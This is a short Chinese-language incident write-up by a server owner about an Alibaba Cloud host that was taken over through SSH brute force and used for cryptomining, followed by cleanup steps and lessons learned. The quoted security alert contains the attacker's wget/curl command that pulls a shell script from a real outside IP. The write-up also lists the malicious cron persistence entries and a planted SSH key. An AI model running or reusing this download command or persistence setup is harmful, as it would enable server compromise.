记录一次云主机被攻击挂恶意代码挖矿的事件

因为ECS使用了有规律的弱密码被SSH暴力破解（非22端口）

阿里云提示被入侵且执行了恶意代码，安全中心可处理。

相关资料： https://bbs.pediy.com/thread-251753.htm

https://zhuanlan.zhihu.com/p/111351235

但至次日凌晨时，依旧报警。

父进程路径：/usr/bin/perl

父进程命令行：rsync

父进程id：12354

进程id：12355

用户名：root

URL连接：http://45.55.129.23/tddwrt7s.sh

进程路径：/usr/bin/bash

命令行参数：sh -c wget -q http://45.55.129.23/tddwrt7s.sh || curl -s -O -f http://45.55.129.23/tddwrt7s.sh 2>&1 3>&1

与该URL有关联的漏洞：None

事件说明：云盾检测到您的服务器正在尝试访问一个可疑恶意下载源，多是黑客经过指令从远程服务器下载恶意文件，危害服务器安全。若是该指令不是您本身运行，请及时排查入侵缘由，例如查看本机的计划任务、发起对外链接的父子进程。

解决方案：请及时排查告警中提示的恶意URL，以及所下载的目录下的恶意文件，并及时清理已运行的恶意进程。若是该指令是您本身主动执行的，您能够在控制台点击标记为误报。

 

------------------------------------

后排查rsync进程目录下有可疑目录，进行了清除。

lrwxrwxrwx 1 root root 0 Mar 19 01:36 cwd -> /dev/shm/.tddddddddd

 

继续排查了定时计划

[root@izbp168lretu4toy79p12kz ~]# crontab -l
* */2 * * * /root/.bashtemprc/a/upd>/dev/null 2>&1
@reboot /root/.bashtemprc/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.bashtemprc/b/sync>/dev/null 2>&1
@reboot /root/.bashtemprc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X19-unix/.rsync/c/aptitude>/dev/null 2>&1

 

依旧存在可疑目录，删除

 

后续发如今/root/.ssh目录中中被植入了黑客的公钥文件authorized_keys， 能够被免密码登陆SSH了。。。

--------------------

吸收些教训：

1.切不可用有规律的密码

2.按期检查系统定时任务是否有可疑的任务

3.按期检查/root/.ssh是否被替换了可疑的公钥